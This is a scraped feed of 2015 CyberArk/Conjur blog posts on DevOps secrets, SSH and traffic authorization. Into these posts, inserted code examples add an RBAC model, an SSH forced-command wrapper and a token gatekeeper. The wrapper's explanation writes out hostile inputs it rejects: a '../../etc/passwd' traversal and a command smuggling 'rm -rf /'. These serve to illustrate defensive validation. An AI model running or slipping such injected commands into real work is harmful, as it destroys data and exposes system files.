
Contact:
Tracy Wemett
BroadPR
+1-617-868-5031
tracy@broadpr.com

All trademarks recognized.

Scaling Enterprise DevOps Security With Machine Identity – Software Defined Firewall https://www.cyberark.com/blog/scaling-enterprise-devops-security-with-machine-identity-software-defined-firewall/ Wed, 12 Aug 2015 14:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-enterprise-devops-security-with-machine-identity-software-defined-firewall/  

This is the third and final part of our ‘Scaling Enterprise DevOps Security with Machine Identity’ series.  In case you missed the other posts, first we discussed Secrets Management, and next we reviewed SSH Management.  In today’s post we are going to look at the final piece of the Enterprise DevOps security puzzle – Software Defined Firewalls.

One of the most unique and interesting challenges posed by cloud architecture is the need for granular access control to web services; especially the web services which make up the “control plane”. By control plane, I mean any application or code whose job is to manage the infrastructure and application deployment pipeline itself.

Small scale: Specific deployment zones are created and managed by ops. Inbound and outbound traffic is governed through specific rules (pipes & channels). Security oversees the configuration of the network from a security standpoint. Developers are pretty unclear about how the whole system works; mismatches between the needs and expectations of developers, ops and security are common and costly.

Large scale: Each application is deployed with a software-defined firewall (SDF). Traffic between individual application instances is governed by each instance’s own SDF. Access rules between applications are managed in terms of application identity (down to the container level) and application authorization. Each app is managed as a service, with foreign identities being given specific privileges to make requests.

Access to control plane services must be tightly managed, because in cloud infrastructure these services literally have full control over the data and applications. These control plane services require:

  • Encryption; messages and traffic must be encrypted in transit.
  • User access control; management personnel must be able to invoke services in a controlled and audited way.
  • “Robot” access control; interaction between services must be controlled and audited as well.
  • Easy-to-use traffic authorization tools; usage of network access rules to govern control plane interactions is cumbersome, frequently breaks down, and imposes a large communication and break/fix overhead on developers and operations teams.

The typical approach to securing service access is to use network techniques like security groups, NAT, VPN, etc. Over the last two years I have helped dozens of companies to deploy and secure new control plane services, and networking configuration is always the #1 time suck.

New services can’t reach the old services; old services can’t reach each other; systems administrators make conflicting changes and break each other’s config; application deployment is slowed by broken network config. Finally, security configurations are opened up wide in order to get the damn thing to work. Sometimes they are tightened up later; sometimes they’re not.

The reason it’s such a pain is because the tools (security groups, VPN, iptables, etc) don’t map cleanly to the application architecture, troubleshooting is ad-hoc, there’s no clear reporting on what’s going wrong when connectivity can’t be established, and the access control fixes aren’t simple, granular or clear.

Again, strong machine identity and authorization offers an answer: authenticate and authorize traffic in a granular way at each service entry and exit point. So, rather than configuring network zones, then deploying code within them and relying on the network to secure the apps, the network security is deployed as part of the application artifact.

In practice, protocol-specific authentication such as an HTTPS bearer token is required on each message. The token is issued according to the client identity (machine or person), and verified on the server side by a proxy interceptor. The authorization rules map exactly to the applications, so it’s clear how to permit or deny traffic as the deployment topology changes.

Summary

Secrets management, SSH management at scale, and software-defined firewalling are three tough problems in infrastructure management. In these three posts, I’ve attempted to describe how strong machine identity and authorization can be used to solve all three of them.

Here at Conjur, we’re best known as the company that invented secrets management for DevOps. But our mission is much bigger than that: our aim is to provide an enterprise-grade security orchestration solution to secure your DevOps infrastructure.

Scaling Enterprise DevOps Security With Machine Identity – SSH https://www.cyberark.com/blog/scaling-enterprise-devops-security-with-machine-identity-ssh/ Mon, 10 Aug 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-enterprise-devops-security-with-machine-identity-ssh/  

In our last post we talked about how secrets management impacts enterprise DevOps security.  Today we are going to shift our focus to another important piece of the puzzle – SSH Management.

SSH is the de-facto standard for logging into Linux machines. And it’s not just a tool for human administrators to access their machines; it’s also a very important facility for machine-to-machine access.

Small scale: A centrally managed LDAP server and a rack of machines or small cloud operation within the same premise (cloud account or data center). Ops is (carefully) managing the LDAP server, and also performing the systems admin over SSH.

Large scale: A global system, being managed by an operations team with oversight from security. Both developers and ops are using SSH access to machines, for tightly controlled purposes. Security has a reporting interface which shows the policies and behavior of the system. SSH is centrally managed and scaled globally.

Like secrets management, SSH management is composed of two parts: authentication and authorization. Authentication can be provided by passwords (bad), public keys (better), or public keys combined with a second factor (best). Unfortunately, the de-facto standard for SSH authorization is LDAP, a protocol designed in the early 1990s as a lightweight front end to the X.500 directory standards of the late 1980s, which were built to serve telephone-style directories.

In LDAP, users are organized into groups, and then access to machines is granted by configuring each machine with an LDAP “search” which is supposed to return the list of users with access to that machine. However, the LDAP “search” model is weak. Typically, the only way to give a new user access to a machine is to add them to a group that already has the desired access. And, as a side effect, the user also gets access to every other machine which is using the same (or similar) LDAP search.

In addition to this lack of granularity, LDAP is cumbersome to manage compared to modern API-driven products, and running highly available LDAP across global cloud or hybrid deployments is difficult.

With machine identity, it’s possible to deliver much better SSH granularity. Using a thin LDAP capability on top of role-based access control, each machine authenticates (“binds”) using its own unique identity. As a result, LDAP searches performed by that machine are automatically scoped and filtered to only the users with access to that machine. The LDAP “search” string becomes irrelevant, because each client machine already has its own distinct user list.

Scaling Enterprise DevOps Security With Machine Identity – Secrets https://www.cyberark.com/blog/scaling-enterprise-devops-security-with-machine-identity-secrets/ Thu, 06 Aug 2015 17:27:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-enterprise-devops-security-with-machine-identity-secrets/  

The rise of DevOps has coincided with an explosion in the number of worldwide software applications and services. Agile software methods, the development of mobile applications and microservices are pushing the number of deployable artifacts ever higher, while DevOps and continuous delivery methods are shortening release cycles from monthly to hourly. Enterprise operations and IT are concurrently developing and deploying hundreds of applications.

DevOps and continuous delivery personnel must avoid being inserted directly into the middle of large-scale and frequently changing environments, or they become overwhelmed with work in the form of support tickets, deployment requests, access control changes, security updates, network reconfiguration, loading new secrets, secrets rotation, etc. Therefore, we look to deploy automated solutions for these common security and access control problems. Agile methodologies encourage us to start with “minimally viable” solutions, even for security, access control, auditing, etc. However, these initial solutions have hard limits in terms of scalability and enterprise suitability.

Once an organization reaches about 50 developers and 500 machines, the initial “DIY” solutions start to break down, and the need for more scalable access control and security solutions becomes clear.

Specifically, the developers, operations, and security teams together face three infrastructure challenges: management and distribution of secrets, machine login access control (e.g. SSH), and authorization of web requests between applications and services. In each of these domains, it’s essential that:

  • Developers have agility and freedom regarding architecture choices and code updates
  • Operations are managing a well-defined deployment architecture which is operated by a small number of stable supporting systems
  • Security has visibility into the development and operational processes, and the ability to see their security suggestions implemented in a timely and transparent manner

These objectives are helped greatly by a strong and uniform system for assigning, tracking, and managing machine identity. Let’s explore how this is so, by taking the use cases one by one. In this post we will discuss Secrets Management.

Secrets Management

First, let’s frame the problem by looking at small-scale and large-scale secrets management:

Small scale: Ops is manually configuring a single machine, and placing the key on it by hand.

Large scale: Dev is pushing the code, and ops is managing the deployment through the control plane. The control plane is spinning up new applications, which are fetching code from the repository. Security is managing the secrets, which are being distributed out to the applications.

If you’ve implemented secrets management at scale, you’ve had to deal with these five requirements:

  1. Encryption; at rest and in transit.
  2. High availability; making sure that the secrets service is “always on”.
  3. Audit; detailed recording of the secrets activity.
  4. Granular distribution; sending secrets where they need to go, and nowhere else.
  5. Collaboration; developers, operations and security each need to be able to use and understand the system.

It turns out that requirements 4 and 5 are by far the most challenging problems. That’s why you’ll see the following flaws in many secrets management tools:

  • Lack of scalability; due to reliance on manual intervention, or encrypting each secret uniquely for each client machine.
  • Lack of granularity; for example, reliance on a single “API password” which can be used by any client machine to get any secret.
  • Reliance on PKI; PKI is notoriously difficult to implement, and it provides authentication but not authorization (it’s not a good way to manage granular access).
  • Obfuscation; only one of the three teams involved (dev, ops, security) understands how the system works.

Conclusion

Assuming we can rule out systems which are non-scalable, rely on a single master key, or provide authentication but not authorization, we’re left with one inevitable conclusion: a good secrets management system must provide both machine authentication and granular access control (e.g. via role-based access control).

That’s why machine identity and RBAC are the foundation of enterprise secrets management. So when you evaluate a secrets management tool, make sure you dig into its capabilities for authorization and granularity. Make sure that developers, operations and security teams all understand how a secrets management rollout will affect them.
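To make the machine-identity argument concrete, here is an added example, not Conjur code: a single role-based policy model used for both the secrets use case in this post and the SSH use case in the previous one. Each host authenticates with its own API key (only a hash is stored), a secret is released only to roles granted `execute` on that specific variable, and the SSH user list a host receives is computed from the same policy rather than from a hand-written LDAP search string. The role names, the `layer:`/`group:`/`variable:` naming and the per-host key scheme are illustrative assumptions, and the policy contents are constructed sample data.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Policy:
    """Roles are users, groups, hosts and layers (groups of hosts).
    Membership is transitive: a host in layer:web holds every privilege
    granted to layer:web.  Grants map (resource, privilege) -> roles."""
    members: dict = field(default_factory=dict)   # child role -> set of parent roles
    grants: dict = field(default_factory=dict)    # (resource, privilege) -> set of roles
    api_keys: dict = field(default_factory=dict)  # host role -> sha256(api key)

    def add_member(self, parent, child):
        self.members.setdefault(child, set()).add(parent)

    def permit(self, role, privilege, resource):
        self.grants.setdefault((resource, privilege), set()).add(role)

    def roles_of(self, role):
        """The role itself plus everything it transitively belongs to."""
        seen, stack = set(), [role]
        while stack:
            r = stack.pop()
            if r not in seen:
                seen.add(r)
                stack.extend(self.members.get(r, ()))
        return seen

    def check(self, role, privilege, resource):
        return bool(self.grants.get((resource, privilege), set()) & self.roles_of(role))

    def enroll_host(self, host):
        """Each machine gets its own API key; the policy stores only its hash."""
        key = secrets.token_hex(16)
        self.api_keys[host] = hashlib.sha256(key.encode()).hexdigest()
        return key

    def authenticate_host(self, host, key):
        stored = self.api_keys.get(host)
        given = hashlib.sha256(key.encode()).hexdigest()
        return stored is not None and hmac.compare_digest(stored, given)


def fetch_secret(policy, store, host, api_key, variable):
    """Secrets use case: authenticate the machine, then authorize the specific
    variable (requirement 4: where it needs to go, and nowhere else).  A shared
    'API password' would collapse both steps into one credential that any
    machine could use to read any secret."""
    if not policy.authenticate_host(host, api_key):
        raise PermissionError("authentication failed for %s" % host)
    if not policy.check(host, "execute", variable):
        raise PermissionError("%s is not permitted to read %s" % (host, variable))
    return store[variable]


def ssh_users_for_host(policy, host, users):
    """SSH use case: the user list a machine receives is derived from the policy
    for that machine, so granting a dev a second host never leaks them onto a third."""
    return sorted(u for u in users if policy.check(u, "login", host))


def build_demo_policy():
    """Constructed sample policy: two web hosts, one database host, ops and devs."""
    p = Policy()
    for h in ("host:web-1", "host:web-2"):
        p.add_member("layer:web", h)
    p.add_member("layer:db", "host:db-1")
    p.add_member("group:ops", "user:alice")
    p.add_member("group:devs", "user:bob")
    # Secrets: the db password goes to the db layer only; web hosts get the API token.
    p.permit("layer:db", "execute", "variable:db/password")
    p.permit("layer:web", "execute", "variable:web/api-token")
    # SSH: ops may log in everywhere, devs only to the web layer.
    for h in ("host:web-1", "host:web-2", "host:db-1"):
        p.permit("group:ops", "login", h)
    for h in ("host:web-1", "host:web-2"):
        p.permit("group:devs", "login", h)
    return p


if __name__ == "__main__":
    policy = build_demo_policy()
    store = {"variable:db/password": "hunter2", "variable:web/api-token": "t0k3n"}
    key = policy.enroll_host("host:web-1")
    print(fetch_secret(policy, store, "host:web-1", key, "variable:web/api-token"))
    try:
        fetch_secret(policy, store, "host:web-1", key, "variable:db/password")
    except PermissionError as e:
        print("denied:", e)
    print(ssh_users_for_host(policy, "host:db-1", ["user:alice", "user:bob"]))
```

The point of the model is that the same `check` answers every question: whether `host:web-1` may read the API token, and which users `host:db-1` should accept over SSH. Adding `user:bob` to `group:devs` gives him the two web hosts and nothing else, which is exactly the granularity an LDAP group search cannot express.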

In the next post we will break down SSH Management and how it fits into the Enterprise DevOps Security equation.


Resounding Message from the 2015 CyberArk Summit: Protect What Matters Most from the Inside https://www.cyberark.com/blog/resounding-message-from-the-2015-cyberark-summit-protect-what-matters-most-from-the-inside/ Fri, 31 Jul 2015 18:10:50 +0000 https://www.cyberark.com/blog//

It’s been an exciting month for us here at CyberArk! We were honored to host two of the largest gatherings of privileged account security professionals in the world at our 2015 Summits, held in Vienna, Austria and Boston, Massachusetts over the past few weeks.

Recognizing that the battleground for securing their organization has shifted, CyberArk customers and partners from all over the world came together in record numbers to discuss how to protect what matters most on the inside. It was exciting to meet with this group of trailblazers – those leading this revolution by adapting to the new threat landscape, taking a proactive stance to security and turning the tide on today’s most formidable cyber attackers.

Our summit agendas were packed with compelling presentations by senior-level security executives from large enterprises across a number of industries – including a global systems integrator, a US-based healthcare company and a notable financial services organization.

These customer presenters urged attendees to design their security strategies on the assumption that they’ve already been breached and attackers have already broken through the perimeter. Throughout these talks, the message was clear: stopping privileged account exploits by taking a proactive, layered approach to securing privileged accounts and credentials is the best – and often last line of defense before a data breach. They spoke of the need for an end-to-end lifecycle approach to privileged account management, and illustrated how CyberArk’s extensive portfolio of privileged account security solutions has empowered them to protect their highest value assets.

The sense of urgency was palpable – organizations cannot afford to wait. Do it right and do it now. A rousing keynote speech by Carey Lohrenz, the Navy’s first female F-14 fighter pilot and Wall Street Journal bestselling author, reinforced this message of leading the charge and driving change within your organization – fearlessly and tenaciously.

Summit attendees were inspired by the message and invigorated by lively interactions, networking and fun with peers and colleagues. We have enjoyed seeing the feedback in the days following our summit events across our social media channels. Here are just a few sound bites:

  • “It was a great opportunity for networking. I witnessed multiple cases of customers working together with product staff to address use cases. Thanks for being consistently available for such conversations!”
  • “It was great to network with others and hear real-world issues and how they worked through them.”
  • “It was a good one – thanks again!”

Trailblazing Together
It was also wonderful for our team to look around these gatherings and see familiar faces we’ve known for years. Many customers and partners have been with us since the beginning, as we pioneered Digital Vault technology over a decade ago.

Even then, as we architected our solution from the ground up, our primary strategic focus was on securing enterprises against cyber attacks that take cover behind insider privileges and attack critical enterprise assets.

And just as our focus has stayed the same all these years, so has our commitment to our customers’ continued success. It’s ingrained in our business strategy and is brought to life through continued, collaborative interactions and ongoing innovation based on customer feedback and changing needs and priorities. Additionally, we’ve continued to enhance our product offerings by establishing technology alliances within the IT infrastructure and security vendor ecosystem with world-class partners.

Today, we’re proud to deliver a unique category of targeted security solutions that help companies stop reacting to cyber threats and instead, get ahead of them, preventing attack escalation before irreparable business harm is done. We are honored to be a vital security partner to more than 1,800 global businesses. Our customers have placed their trust in our team and our products, and we don’t ever take that lightly.

We’re in this with you, every step of the way, trailblazing together. And we thank you for making our 2015 Summits an overwhelming success!

Dynamic Credential Access:  Jenkins and Conjur, Revisited https://www.cyberark.com/blog/dynamic-credential-access-jenkins-and-conjur-revisited/ Fri, 31 Jul 2015 16:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/dynamic-credential-access-jenkins-and-conjur-revisited/  

Kevin previously described how Conjur secured Jenkins when building our various artifacts. We currently use release-bot to publish our artifacts, but this approach hasn’t scaled well — it’s hard to get Heroku to run the tooling we need for publishing. This post will describe a new architecture for getting our build artifacts to their various destinations.

Security when releasing code is as important as when building it. Without a secure release process, anyone can push anything and claim it’s a release. Because a shared Jenkins instance is open to everyone who can define or modify a job, letting a Jenkins job push an artifact directly is inherently insecure and offers no trustworthy audit trail.

Separating the release machine from the build machine allows for better security. Instead of having a Jenkins job publish the artifact itself, it interacts with a separate release server. The release server has the credentials to publish to various destinations (e.g. RubyGems.org, Heroku, Docker Hub, etc) but doesn’t have the ability to build artifacts or modify them in any way. This is consistent with least privilege: the Jenkins job can do builds but not push releases; the release machine can push releases but not do builds.

After a Jenkins build job runs, a Conjur employee starts the promotion process. A Makefile that’s part of the project bundles up the build artifacts, then invokes a script to kick off deployment. If the output of the build job is a set of files (e.g. the output of building a gem), the script uses scp to copy the artifact to the release machine. If the output of the build job is a docker image, the build job pushes it to our local docker repository.

Once the artifact is available to the release machine, the Jenkins promotion job uses ssh to connect to it. The remote user can execute only a single command on the release machine: it can run a publishing script, and nothing else. Because the release machine is granted powerful privileges, access to it must be very limited.

The publishing script labels the artifact with the build information, then asks Conjur for deployment credentials. Because it runs on a machine in the release layer, the script is authorized to use these credentials. It publishes the artifact to its destination, then writes a Conjur audit record indicating that it did so (or failed to do so).

This architecture will allow us to add new kinds of artifacts more easily than if we stuck with release-bot. We’ll be able to push them out securely, and show that only sufficiently privileged entities publish releases.
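The “single command” restriction above is the part that carries the least-privilege guarantee, so here is an added example of how to enforce it. This is written for this post, not taken from Conjur’s release tooling, and it assumes the Jenkins promotion key is installed on the release machine with a forced command in `authorized_keys`, for instance `command="/usr/local/bin/publish-wrapper",no-pty,no-port-forwarding,no-agent-forwarding,no-X11-forwarding ssh-ed25519 AAAA... jenkins-promote`. With that entry, sshd ignores whatever the client asked to run, executes the wrapper instead, and passes the original request in `SSH_ORIGINAL_COMMAND`; the wrapper decides what is allowed. The drop directory, the real publishing script path and the artifact kinds are assumed names.

```python
import os
import posixpath
import re
import shlex
import sys

ARTIFACT_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")   # no '/', no leading '.'
VERSION_RE = re.compile(r"^\d+\.\d+\.\d+(?:[-.][A-Za-z0-9.]+)?$")  # semver-ish
KINDS = ("gem", "docker", "heroku")            # assumed publishing targets
INCOMING = "/srv/release/incoming"             # assumed scp drop directory
PUBLISH = "/usr/local/bin/publish"             # assumed real publishing script


class Rejected(Exception):
    pass


def parse_publish_command(original):
    """Accept exactly `publish <kind> <artifact> <version>` and nothing else.
    Allow-list validation means shell metacharacters, path separators and
    extra arguments never reach the publishing script."""
    if not original:
        raise Rejected("interactive shell not permitted")
    try:
        argv = shlex.split(original)
    except ValueError as exc:                  # unbalanced quotes etc.
        raise Rejected("unparseable command: %s" % exc)
    if len(argv) != 4 or argv[0] != "publish":
        raise Rejected("only 'publish <kind> <artifact> <version>' is allowed")
    kind, artifact, version = argv[1:]
    if kind not in KINDS:
        raise Rejected("unknown artifact kind %r" % kind)
    if not ARTIFACT_RE.match(artifact):
        raise Rejected("bad artifact name %r" % artifact)
    if not VERSION_RE.match(version):
        raise Rejected("bad version %r" % version)
    return kind, artifact, version


def is_allowed(original):
    try:
        parse_publish_command(original)
        return True
    except Rejected:
        return False


def artifact_path(kind, artifact, version):
    """Where the build job's scp put the file.  ARTIFACT_RE already excludes
    '/' and a leading '.', so the result cannot escape INCOMING; the check
    below is defence in depth."""
    path = posixpath.normpath(posixpath.join(INCOMING, kind, "%s-%s" % (artifact, version)))
    if posixpath.commonpath([INCOMING, path]) != INCOMING:
        raise Rejected("path escapes %s" % INCOMING)
    return path


def main():
    original = os.environ.get("SSH_ORIGINAL_COMMAND", "")
    try:
        kind, artifact, version = parse_publish_command(original)
        path = artifact_path(kind, artifact, version)
    except Rejected as exc:
        # Refusals are worth auditing too: record exactly what was asked for.
        print("publish-wrapper: rejected %r: %s" % (original, exc), file=sys.stderr)
        sys.exit(1)
    # Hand off validated arguments only.  The real script labels the artifact,
    # fetches the destination credential and writes the audit record.
    os.execv(PUBLISH, ["publish", kind, path, version])


if __name__ == "__main__":
    main()
```

Two details matter in practice: the `no-pty,no-port-forwarding,no-agent-forwarding` options on the key close the side channels a forced command alone does not, and the wrapper validates with allow-lists rather than stripping “dangerous” characters, so a request like `publish gem ../../etc/passwd 1.0.0` or `publish gem conjur-api 4.9.1; rm -rf /` is refused outright and logged.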

Click on the video below to see how Conjur helps give Jenkins jobs temporary access to the secrets they need to run tests and build artifacts.


We’re Going to Vegas… Black Hat Here We Come! https://www.cyberark.com/blog/were-going-to-vegas-black-hat-here-we-come/ Thu, 30 Jul 2015 17:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/were-going-to-vegas-black-hat-here-we-come/  

We can’t wait to get in on the action and chat with the industry’s finest at Black Hat next week.

Black Hat is an annual, global information security conference that emphasizes current information security research and development. Attendees of the conference can expect to experience informative trainings that Black Hat says are “driven by the needs of the security community, striving to bring together the best minds in the industry.” Professionals of all career levels are encouraged to attend. This all sounds awesome, right?

Lucky for you there is still time to register for Black Hat USA!

Conjur’s Josh Bregman will be at Black Hat from August 5-6. If you’re going to be there too let him know, Josh would love to take some time to chat with you!

You can tweet to him @kingoauth, send him an email at josh.bregman@conjur.net, or click on the link below to schedule a live demo of Conjur.


The Uconnect Hack And Why Companies Need To Put A Premium on Safety https://www.cyberark.com/blog/the-uconnect-hack-and-why-companies-need-to-put-a-premium-on-safety/ Mon, 27 Jul 2015 15:19:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-uconnect-hack-and-why-companies-need-to-put-a-premium-on-safety/  

There are few places we feel safer than in our cars. And why wouldn’t we, we take care of our cars, we get our tires checked, we get our oil changed, and we pay a premium for fuel. We do all of these things so that when we are in the driver’s seat we feel safe and know that as we grasp the steering wheel we are in complete control… or so we think.

Chrysler was in the news last week after security researchers Charlie Miller and Chris Valasek gained remote control of a Jeep Cherokee. Through a vulnerability in Uconnect, the Internet-connected infotainment system in Chrysler vehicles, they were able to cut the transmission and stop the vehicle as it merged onto the highway, leaving the car at a dead stop as an 18-wheeler approached.

One of the most interesting commentaries that came out of this discussion was that instead of blaming the quick advances in technology, instead of wishing for the “good old days” when everything wasn’t digital, we should put more pressure on companies to put our security first; we pay a premium for their services, they should put a premium on our safety.

Take a look at these articles for the full story and some new perspective.

Andy Greenberg, the author of this piece and the driver of the Jeep, describes his time in the driver’s seat as the car was being hacked. Andy willingly participated in the event however he was never told when and where the vehicle takeover would occur.

CTV News points out that although the security concern was only recently publicized, Chrysler was alerted to the issue nine months earlier. It took a while to come up with a fix, and even the current solution isn’t ideal: car owners must download the patch onto a USB drive and install it themselves. What is even more alarming is that only 56% of drivers have their cars fixed when there is a recall, meaning many remain vulnerable.

This LA Times editorial warned automakers that they should take the Chrysler breach as a warning. The author points out that Chrysler failed to keep the most important parts, those controlling the brakes, steering, etc. separate from the parts that communicate with the outside world. Automakers are racing to create new, high-tech vehicles, ones that showcase entertainment and connectivity, yet the creators are failing to protect the vehicles from hackers working to get into the system.

This piece on BBC.com was written in response to the hack.  A team in the UK, called NCC Group, found a similar flaw. They figured out how to hack into an entertainment system and then have access to the car’s brakes and steering. Andy Davis of NCC said that if there is an issue in the infotainment system for one manufacturer it would take only one stream of data to control multiple cars simultaneously.

Robert Nicholls of The Market Business delivers a new perspective on recent events. Instead of blaming technology for these problems we should put pressure on companies and police to stay properly informed and secure. Companies need to continue advancing technologically while also maintaining total security for their customers.


How Securing WebQuake Is Like Securing An Enterprise Application https://www.cyberark.com/blog/how-securing-webquake-is-like-securing-an-enterprise-application/ Mon, 20 Jul 2015 14:53:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-securing-webquake-is-like-securing-an-enterprise-application/  

Securing an Insecure App Using Conjur

Improving the security of an existing application which was not designed with security in mind is a common problem. Here’s a fun real-world example: WebQuake, a port of Quake to HTML5 (client) and Node.js (server). It’s composed of the following sub-projects:

  • Client: an HTTP server (it’s not really a client…) which serves JavaScript and static assets (textures, sound etc). With only the Client web server, you can load and run single-player Quake in your browser.

  • A web browser which connects to the Client web server to retrieve the game assets and renders the game using HTML5.

  • Server: uses HTTP and WebSocket to implement multiplayer mode. From the browser, you can enter the WebSocket URL of a Server; the Server will accept your connection automatically and join you to the running multi-player game.

See it for yourself (YouTube, 1 minute)

“We Didn’t Initially Prioritize Security”

Let’s Secure WebQuake

We were surprised how similar Quake is to an enterprise application in terms of the required “cleanup,” despite it being a video game. We chose it partly because it was never meant to be studied as an example of good security code. (And partly because it’s fun!)

There are several problems that need to be addressed:

Only one password per server

WebQuake implements a facility called “rcon” (remote control). From the browser, a Quake admin will send remote commands to the server, which will perform actions such as changing the map or kicking out players. “rcon” is protected by a single password which is shared among all the server admins.

Remember, password sharing is bad security because:

  • It’s impossible to revoke the access of an individual user.

  • Changing the password is difficult, because all users must be notified simultaneously.

Furthermore, the WebQuake server does not have any secure mechanism for storing and restoring the password, or encrypting it at rest.

No traffic encryption

The client does not support the use of an encrypted channel. The “rcon” password we mentioned earlier is being sent over a plaintext channel.

Traffic between the browser and the servers should use HTTPS.

Weak traffic authorization

The server doesn’t implement any authorization of inbound traffic, aside from the “rcon” password.

Fixing the problems

Step 1 – kill the passwords

We will remove the “rcon” password from both the client and the server. This strips WebQuake to its core: a game, not a user authorization system!

Remove the client password:

https://github.com/conjurdemos/WebQuake/commit/668599c4b5762169f3b07d84726246aef86a3781#diff-7a8a12fcc187599b0abecad5a4258d46L477

Remove the server password:

https://github.com/conjurdemos/WebQuake/commit/1ea67dc6c9aaed52830a63d74ae6ecb2dc3b7b25#diff-635e25ef0c0a7a5d9cfa48f9fa897b65L183

Step 2 – refactor the application security architecture

Rather than use passwords to control access, we’ll use a traffic authorization gatekeeper.

Refactor with traffic authorization

To implement traffic authorization, we will add two additional services:

  • Forwarder: a reverse proxy which runs on the local machine of each player. The Forwarder intercepts each connection to the server, and places an authorization token on it (which it has obtained from the Token Broker).

  • Gatekeeper: a reverse proxy which sits in front of the server. It intercepts all inbound requests, and verifies the token authenticity and authorization privileges of the client with the Token Broker.

In this manner, access management is handled entirely outside WebQuake.

Step 3 – Define the security policy

The server will use role-based access control. We’ll declare this using a policy document and commit it to the server code repository.

https://github.com/conjurdemos/WebQuake/blob/master/Server/policy.rb

To deploy the WebQuake server, an administrator will load the policy to create application roles and resources.

The gatekeeper will run outside the game, enforcing the security policy before traffic reaches the game. A dedicated security layer allows the application developer to focus on the application, not on security. The gatekeeper will enable us to use separate roles for system administrators, regular game players, and game superusers (players who can use rcon).

Step 4 – Assign client (user) identity and grant roles

To use the server, clients must present an auth token to the gatekeeper. They can obtain this token from the security authentication service, by presenting a username and password (or API key).


Each client is assigned these credentials, and granted one of the roles defined in the policy.

Step 5 – Deploy

To make the application easier to deploy, we’ll package each component as a Docker container. Then, both the client and server can be launched and managed using Docker tools.

(If all the Dockerizing details were presented here, this would quickly turn into a post about Docker! Read Securing Docker With Secrets and Dynamic Traffic Authorization for details.)
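The token flow of Steps 2 to 4 (the broker issues a token against a username and API key, the Forwarder stamps it onto each request, the Gatekeeper verifies it and checks the role before anything reaches the game), as an added Ruby example. This is not the WebQuake demo’s own code: the class names, the HMAC-signed token format, the action names and the credentials are assumptions made for this illustration, and everything runs in one process with no network.

```ruby
require 'openssl'
require 'json'
require 'securerandom'

# Role-based policy for the three roles the post names (action names assumed).
POLICY = {
  'player'    => %w[connect play],
  'superuser' => %w[connect play rcon],
  'sysadmin'  => %w[connect play rcon restart]
}.freeze

# Token Broker: authenticates a client by username + API key and issues a
# short-lived HMAC-signed token carrying the client's role. Constructed for
# this example; the signing key never leaves the broker.
class TokenBroker
  def initialize(key = SecureRandom.random_bytes(32))
    @key = key
    @users = {} # username => { api_key:, role: }
  end

  def enroll(user, api_key, role)
    @users[user] = { api_key: api_key, role: role }
  end

  # Returns "base64(claims).hmac", or nil when the credentials are wrong.
  def issue_token(user, api_key, ttl: 300, now: Time.now.to_i)
    rec = @users[user]
    return nil unless rec && secure_equal?(rec[:api_key], api_key)
    payload = { 'sub' => user, 'role' => rec[:role], 'exp' => now + ttl }.to_json
    "#{[payload].pack('m0')}.#{sign(payload)}"
  end

  # Returns the claims Hash when the signature is valid and the token has not
  # expired; nil otherwise (malformed, tampered and stale tokens all fail closed).
  def verify(token, now: Time.now.to_i)
    b64, mac = token.to_s.split('.', 2)
    return nil unless b64 && mac
    payload = b64.unpack1('m0')
    return nil unless secure_equal?(sign(payload), mac)
    claims = JSON.parse(payload)
    return nil unless claims.is_a?(Hash) && claims['exp'].is_a?(Integer) && claims['exp'] > now
    claims
  rescue ArgumentError, JSON::ParserError
    nil
  end

  private

  def sign(payload)
    OpenSSL::HMAC.hexdigest('SHA256', @key, payload)
  end

  # Constant-time comparison so a forged MAC cannot be guessed byte by byte.
  def secure_equal?(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# Forwarder: the per-player reverse proxy. It obtains a token once and stamps
# it onto every outbound request; the game client never handles a password.
class Forwarder
  def initialize(broker, user, api_key)
    @broker, @user, @api_key = broker, user, api_key
    @token = nil
  end

  def forward(request)
    @token ||= @broker.issue_token(@user, @api_key)
    request.merge('headers' => { 'Authorization' => "Token #{@token}" })
  end
end

# Gatekeeper: the reverse proxy in front of the server. Only requests carrying
# a valid token for a role permitted to perform the action get through.
class Gatekeeper
  def initialize(broker, policy = POLICY)
    @broker, @policy = broker, policy
  end

  # Returns [status, message]; the game server only ever sees status 200.
  def admit(request, now: Time.now.to_i)
    header = request.dig('headers', 'Authorization').to_s
    claims = @broker.verify(header.delete_prefix('Token '), now: now)
    return [401, 'invalid or expired token'] unless claims
    action = request['action']
    return [403, "role #{claims['role']} may not #{action}"] unless @policy.fetch(claims['role'], []).include?(action)
    [200, "#{claims['sub']} -> #{action}"]
  end
end

if $PROGRAM_NAME == __FILE__
  broker = TokenBroker.new
  broker.enroll('alice', 'alice-key', 'player') # constructed credentials
  gate = Gatekeeper.new(broker)
  alice = Forwarder.new(broker, 'alice', 'alice-key')
  p gate.admit(alice.forward({ 'action' => 'play' })) # [200, "alice -> play"]
  p gate.admit(alice.forward({ 'action' => 'rcon' })) # [403, "role player may not rcon"]
end
```

The point to take from the example is where the decisions are made: the game server never sees a credential, and revoking a player means deleting one enrollment at the broker (or letting the short token expire), which is exactly what the shared rcon password could not offer.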

Demo

The full WebQuake application now consists of:

  • Web, a dockerized HTTP server, serving static assets

  • Proxy forwarder, running on the local machine, intercepting outbound requests

  • Web browser

  • Server Gatekeeper, intercepting traffic, authorizing it, and passing authorized traffic through to the server.


View a complete run-through! (YouTube, 6 minutes)

Delivering Conjur with Vagrant https://www.cyberark.com/blog/delivering-conjur-with-vagrant/ Wed, 15 Jul 2015 15:34:00 +0000 https://cyberarkvx2.wpengine.com/blog/delivering-conjur-with-vagrant/  

The team at Conjur helps our customers deploy their application into many different environments: cloud providers like AWS and Joyent, internal VM clusters, bare-metal setups, and local VMs for evaluation. When we get down to it, though, these different configurations can all be set up as wrappers around a fundamental Conjur LXC container. To package that up for all of these different setups we use Vagrant. The Vagrant plugin ecosystem makes it easy to swap in, and deploy to, different providers.

One Vagrantfile to rule them all

